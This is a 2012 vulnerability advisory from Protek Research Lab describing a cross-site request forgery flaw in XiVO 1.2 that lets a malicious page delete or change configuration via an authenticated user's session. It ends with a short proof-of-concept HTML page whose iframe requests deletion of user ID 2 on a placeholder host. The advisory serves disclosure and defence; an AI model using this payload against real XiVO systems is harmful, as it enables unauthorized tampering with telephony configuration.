PRL-2012-34

#####################################################################################

Application:  XIVO 1.2 CSRF vulnerability

Version:   1.2

{PRL}:   2012-34

Author:   Francis Provencher (Protek Research Lab’s)

Website:   http://www.protekresearchlab.com/

Twitter:   @ProtekResearch

#####################################################################################

1) Introduction
2) Report Timeline
3) Technical details
4) The Code

#####################################################################################

===============
1) Introduction
===============

XiVO is free software. Most of its distinctive components, and XiVO as a whole, are distributed under

the GPLv3 license. We are also working on a fully Open XiVO Hardware.

(https://wiki.xivo.fr/)

#####################################################################################

============================
2) Report Timeline
============================

2011-11-03  Pwn2Own Hackfest

2012-11-21  Publication of this advisory

#####################################################################################

============================
3) Technical details
============================

Its possible to delete, modify arbitrary config into Xivo system by enticed an authenticated

user to visite a malicious web site.
#####################################################################################

===========
4) The Code
===========
<html><head><body>
<title>Deleter user ID 2</title>
<iframe src=https://x.x.x.x/xivo/configuration/index.php/manage/user/?act=delete&id=2&page=1′);
</body></head><html>

###############################################################################